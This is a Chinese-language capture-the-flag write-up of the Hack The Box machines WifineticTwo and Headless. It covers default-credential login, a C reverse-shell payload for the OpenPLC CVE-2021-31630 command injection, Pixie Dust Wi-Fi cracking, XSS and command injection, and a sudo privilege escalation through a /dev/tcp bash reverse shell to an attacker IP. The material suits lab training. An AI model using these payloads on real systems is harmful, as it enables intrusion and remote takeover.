WifineticTwo_MID
题目来源
Hack The Box - Season 4 - WifineticTwo
MID
考点
- 弱密码(出厂密码)
- CVE-2021-31630 (PLC 命令执行RCE)
- Pixie Dust attack
分析
nmap 扫描一波
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39Nmap scan report for 10.129.84.209
Host is up (0.27s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
8080/tcp open http-proxy Werkzeug/1.0.1 Python/2.7.18
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at <https://nmap.org/cgi-bin/submit.cgi?new-service> :
SF-Port8080-TCP:V=7.93%I=7%D=3/23%Time=65FEFBCB%P=x86_64-pc-linux-gnu%r(Ge
SF:tRequest,24C,"HTTP/1\\.0\\x20302\\x20FOUND\\r\\ncontent-type:\\x20text/html;\\
SF:x20charset=utf-8\\r\\ncontent-length:\\x20219\\r\\nlocation:\\x20http://0\\.0\\
SF:.0\\.0:8080/login\\r\\nvary:\\x20Cookie\\r\\nset-cookie:\\x20session=eyJfZnJlc
SF:2giOmZhbHNlLCJfcGVybWFuZW50Ijp0cnVlfQ\\.Zf77rQ\\.uUR_ApVdL7hf-zxtvZ-p7A7R
SF:gME;\\x20Expires=Sat,\\x2023-Mar-2024\\x2016:01:29\\x20GMT;\\x20HttpOnly;\\x2
SF:0Path=/\\r\\nserver:\\x20Werkzeug/1\\.0\\.1\\x20Python/2\\.7\\.18\\r\\ndate:\\x20S
SF:at,\\x2023\\x20Mar\\x202024\\x2015:56:29\\x20GMT\\r\\n\\r\\n<!DOCTYPE\\x20HTML\\x2
SF:0PUBLIC\\x20\\"-//W3C//DTD\\x20HTML\\x203\\.2\\x20Final//EN\\">\\n<title>Redire
SF:cting\\.\\.\\.</title>\\n<h1>Redirecting\\.\\.\\.</h1>\\n<p>You\\x20should\\x20be
SF:\\x20redirected\\x20automatically\\x20to\\x20target\\x20URL:\\x20<a\\x20href=\\
SF:"/login\\">/login</a>\\.\\x20\\x20If\\x20not\\x20click\\x20the\\x20link\\.")%r(H
SF:TTPOptions,14E,"HTTP/1\\.0\\x20200\\x20OK\\r\\ncontent-type:\\x20text/html;\\x
SF:20charset=utf-8\\r\\nallow:\\x20HEAD,\\x20OPTIONS,\\x20GET\\r\\nvary:\\x20Cooki
SF:e\\r\\nset-cookie:\\x20session=eyJfcGVybWFuZW50Ijp0cnVlfQ\\.Zf77rg\\.CbZEJyD
SF:ZJkIklPJ_i0DWnVTRV3Q;\\x20Expires=Sat,\\x2023-Mar-2024\\x2016:01:30\\x20GMT
SF:;\\x20HttpOnly;\\x20Path=/\\r\\ncontent-length:\\x200\\r\\nserver:\\x20Werkzeug
SF:/1\\.0\\.1\\x20Python/2\\.7\\.18\\r\\ndate:\\x20Sat,\\x2023\\x20Mar\\x202024\\x2015
SF::56:30\\x20GMT\\r\\n\\r\\n")%r(RTSPRequest,CF,"HTTP/1\\.1\\x20400\\x20Bad\\x20re
SF:quest\\r\\ncontent-length:\\x2090\\r\\ncache-control:\\x20no-cache\\r\\ncontent
SF:-type:\\x20text/html\\r\\nconnection:\\x20close\\r\\n\\r\\n<html><body><h1>400\\
SF:x20Bad\\x20request</h1>\\nYour\\x20browser\\x20sent\\x20an\\x20invalid\\x20req
SF:uest\\.\\n</body></html>\\n")%r(Socks5,CF,"HTTP/1\\.1\\x20400\\x20Bad\\x20requ
SF:est\\r\\ncontent-length:\\x2090\\r\\ncache-control:\\x20no-cache\\r\\ncontent-t
SF:ype:\\x20text/html\\r\\nconnection:\\x20close\\r\\n\\r\\n<html><body><h1>400\\x2
SF:0Bad\\x20request</h1>\\nYour\\x20browser\\x20sent\\x20an\\x20invalid\\x20reque
SF:st\\.\\n</body></html>\\n")%r(RPCCheck,CF,"HTTP/1\\.1\\x20400\\x20Bad\\x20requ
SF:est\\r\\ncontent-length:\\x2090\\r\\ncache-control:\\x20no-cache\\r\\ncontent-t
SF:ype:\\x20text/html\\r\\nconnection:\\x20close\\r\\n\\r\\n<html><body><h1>400\\x2
SF:0Bad\\x20request</h1>\\nYour\\x20browser\\x20sent\\x20an\\x20invalid\\x20reque
SF:st\\.\\n</body></html>\\n");
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel8080 开了一个 openPLC webserver
搜了一下,默认密码:openplc ;openplc
找一下历史漏洞,有一个RCE CVE-2021-31630
改一下代码直接 exploit ,好像不出网,弹内网 IP
弹不上
服了
额
还是老老实实学学这个漏洞原理吧。网上搜不到,但大概是一个 PLC 命令执行。
PLC(Programmable Logic Controller),可编程逻辑控制器。一种具有微处理器的数字电子设备,可用于自动化控制的数字逻辑控制器。也就是通过数字式和模拟式的输入和输出,控制各类机械或生产过程。
漏洞描述:Command Injection in Open PLC Webserver v3 allows remote attackers to execute arbitrary code via the “Hardware Layer Code Box” component on the “/hardware” page of the application.
也就是通过st,然后上一个 C 的马。
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
int ignored_bool_inputs[] = {{-1}};
int ignored_bool_outputs[] = {{-1}};
int ignored_int_inputs[] = {{-1}};
int ignored_int_outputs[] = {{-1}};
void initCustomLayer()
{{
}}
void updateCustomIn()
{{
}}
void updateCustomOut()
{{
int port = {local_port};
struct sockaddr_in revsockaddr;
int sockt = socket(AF_INET, SOCK_STREAM, 0);
revsockaddr.sin_family = AF_INET;
revsockaddr.sin_port = htons(port);
revsockaddr.sin_addr.s_addr = inet_addr("{local_ip}");
connect(sockt, (struct sockaddr *) &revsockaddr,
sizeof(revsockaddr));
dup2(sockt, 0);
dup2(sockt, 1);
dup2(sockt, 2);
char * const argv[] = {{"bash", NULL}};
execvp("bash", argv);
return 0;
}}
一个 C 写的反弹 shell 的马
换了一个exp,连上了哈哈~
获得 user flag
1
2
3
4
5cd /root
ls
user.txt
cat user.txt
d7968ed5c6e9b1bf316a86447df9dad4提权
目前已经是 root,下一步可能需要提权为 system。或者逃逸
先信息搜集一波
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34# pwd
> pwd
/opt/PLC/OpenPLC_v3/webserver
# 目前权限
> id
uid=0(root) gid=0(root) groups=0(root)
# IP 情况
> ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 10.0.3.2 netmask 255.255.255.0 broadcast 10.0.3.255
inet6 fe80::216:3eff:fefc:910c prefixlen 64 scopeid 0x20<link>
ether 00:16:3e:fc:91:0c txqueuelen 1000 (Ethernet)
RX packets 83094 bytes 6682265 (6.6 MB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 50939 bytes 8976145 (8.9 MB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
inet6 ::1 prefixlen 128 scopeid 0x10<host>
loop txqueuelen 1000 (Local Loopback)
RX packets 4891 bytes 337239 (337.2 KB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 4891 bytes 337239 (337.2 KB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
wlan0: flags=4099<UP,BROADCAST,MULTICAST> mtu 1500
ether 02:00:00:00:02:00 txqueuelen 1000 (Ethernet)
RX packets 0 bytes 0 (0.0 B)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 0 bytes 0 (0.0 B)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0ps
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17> ps -aux
USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND
root 1 0.0 0.2 17996 10508 ? Ss Mar23 0:01 /sbin/init
root 125 0.0 0.5 55904 20732 ? S<s Mar23 0:02 /lib/systemd/systemd-journald
systemd+ 152 0.0 0.2 16112 8120 ? Ss Mar23 0:00 /lib/systemd/systemd-networkd
systemd+ 155 0.0 0.3 25524 12628 ? Ss Mar23 0:00 /lib/systemd/systemd-resolved
root 160 0.0 0.0 9484 2860 ? Ss Mar23 0:00 /usr/sbin/cron -f -P
message+ 161 0.0 0.1 8540 4700 ? Ss Mar23 0:00 @dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only
root 163 0.0 0.4 34288 18704 ? Ss Mar23 0:00 /usr/bin/python3 /usr/bin/networkd-dispatcher --run-startup-triggers
syslog 164 0.0 0.1 222392 4904 ? Ssl Mar23 0:00 /usr/sbin/rsyslogd -n -iNONE
root 165 0.0 0.1 14896 6312 ? Ss Mar23 0:00 /lib/systemd/systemd-logind
root 166 0.0 0.1 16488 5708 ? Ss Mar23 0:00 /sbin/wpa_supplicant -u -s -O /run/wpa_supplicant
root 171 0.0 0.0 9960 3512 ? Ss Mar23 0:00 /bin/bash /opt/PLC/OpenPLC_v3/start_openplc.sh
root 173 0.0 0.8 466676 33016 ? Sl Mar23 0:22 python2.7 webserver.py
root 174 0.0 0.0 8388 1096 pts/0 Ss+ Mar23 0:00 /sbin/agetty -o -p -- \\u --noclear --keep-baud console 115200,38400,9600 vt220
root 2921 0.0 0.0 9960 3572 ? S 08:51 0:00 bash
root 2925 0.0 0.0 12924 3700 ? R 08:53 0:00 ps -aux搜了一下是无线安全打 WiFi 的(Pixie Dust attack),可以直接用 oneshot 进行Pixie Dust attack,获得 WIFI 的 WPA PSK 。然后连接 WIFI 最后
ssh root@wifi的ip根本不懂呜呜,,
Headless_EASY
题目来源
Hack The Box - Season 4 - Headless
EASY
考点
分析
先 nmap
1
2
3
4
5
6
7
8$ nmap -sV -Pn 10.129.217.40
Nmap scan report for 10.129.217.40
Host is up (0.26s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 9.2p1 Debian 2+deb12u2 (protocol 2.0)
5000/tcp open upnp?
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernelupnp-evnt看看怎么个事儿UPnP(通用即插即用)服务是一种基于UPnP协议,用于实现设备之间互相发现和交谈的服务。UPnP服务通常可以包括多种类型的服务,例如媒体服务器服务、打印机服务、网络存储服务等等。
UPnP服务通常在设备之间使用HTTP协议进行通信,设备可以通过HTTP请求(如HTTP GET、POST等)来查询其他设备的服务,并且根据查询结果来做出相应的操作。因此,UPnP服务也称为互联网设备联盟设备控制协议(UPnP Device Control Protocol)。
在UPnP服务架构中,设备通常包含一个设备描述文档(Device Description Document),它定义了设备的基本信息、属性、状态、可用服务等。设备描述文档基于XML格式编写,由设备厂商提供。
需要注意的是,UPnP服务的开放性和易用性也带来了安全风险。未经适当保护的UPnP服务可能会被黑客利用,从而导致网络受到攻击。为了减轻这种风险,DOWNUPnP Forum和其他组织已经制定了一些UPnP安全模型和UPnP安全指南,旨在帮助设备生产厂商和用户加强对UPnP服务的管控和保护。
访问 5000
抓个包看看
1 | <http://10.129.217.40:5000/support> |
首先有一个
is_admin的 cookie ,base64_decode 出来前半部分为 user,说明需要越权到admin。message 处富文本随便试一下
xss被告警,说明有过滤,所以考点是XSS bypassURL 编码绕过
< >就可以。这里内网环境需要内网搭建 XSS platform。好麻烦,直接抄了,假装打过hhhfuzz 一下发现:
//dashboard/suport三个目录然后访问
/dashboard在date=2023-09-15处有回显,分号拼接进行命令注入。getflag有一个小坑。使用 bash 弹不回来。不知道是不是因为
$SHELL=/bin/zsh改用 nc 弹
1 | # psych @ VM-8-4-debian in /root [22:37:19] |
进去之后是dvir的权限,下一步是提权到 root
/etc/passwd
1
2
3
4
5
6
7> cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
···
colord:x:110:120:colord colour management daemon,,,:/var/lib/colord:/usr/sbin/nologin
dvir:x:1000:1000:dvir,,,:/home/dvir:/bin/bash
sshd:x:111:65534::/run/sshd:/usr/sbin/nologin
_laurel:x:999:994::/var/log/laurel:/bin/falsesudo
1
2
3
4
5
6
7
8> sudo -l
Matching Defaults entries for dvir on headless:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin,
use_pty
User dvir may run the following commands on headless:
(ALL) NOPASSWD: /usr/bin/syscheck其中的
syscheck相当于SUID,可以进行提权嘛先 cat 一下
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25> cat /usr/bin/syscheck
#!/bin/bash
if [ "$EUID" -ne 0 ]; then
exit 1
fi
last_modified_time=$(/usr/bin/find /boot -name 'vmlinuz*' -exec stat -c %Y {} + | /usr/bin/sort -n | /usr/bin/tail -n 1)
formatted_time=$(/usr/bin/date -d "@$last_modified_time" +"%d/%m/%Y %H:%M")
/usr/bin/echo "Last Kernel Modification Time: $formatted_time"
disk_space=$(/usr/bin/df -h / | /usr/bin/awk 'NR==2 {print $4}')
/usr/bin/echo "Available disk space: $disk_space"
load_average=$(/usr/bin/uptime | /usr/bin/awk -F'load average:' '{print $2}')
/usr/bin/echo "System load average: $load_average"
if ! /usr/bin/pgrep -x "initdb.sh" &>/dev/null; then
/usr/bin/echo "Database service is not running. Starting it..."
./initdb.sh 2>/dev/null
else
/usr/bin/echo "Database service is running."
fi
exit 0里面涉及检查
initdb.sh的进程,如果没有,就运行./initdb.sh 2>/dev/null所以直接创建一个
./initdb.sh然后写进去:/bin/bash并chmod x权限然后
sudo执行syscheck,就会sudo执行initdb.sh我们直接在 initdb.sh 里面写反弹 shell
1
2
3
4
5
6
7
8> echo "/bin/bash -i >& /dev/tcp/10.10.14.51/50003 0>&1" > initdb.sh
> chmod +x ./initdb.sh
> sudo /usr/bin/syscheck
sudo /usr/bin/syscheck
Last Kernel Modification Time: 01/02/2024 10:05
Available disk space: 2.0G
System load average: 0.00, 0.00, 0.00
Database service is not running. Starting it...弹回来
1
2
3
4
5
6
7
8
9
10# root @ VM-8-4-debian in ~ [23:43:39]
$ nc -lvvp 50003
listening on [any] 50003 ...
10.129.217.40: inverse host lookup failed: Unknown host
connect to [10.10.14.51] from (UNKNOWN) [10.129.217.40] 33598
bash: cannot set terminal process group (1157): Inappropriate ioctl for device
bash: no job control in this shell
root@headless:/home/dvir/app# cat /root/root.txt
cat /root/root.txt
3db7268a07f2c4f37ae88500878b7590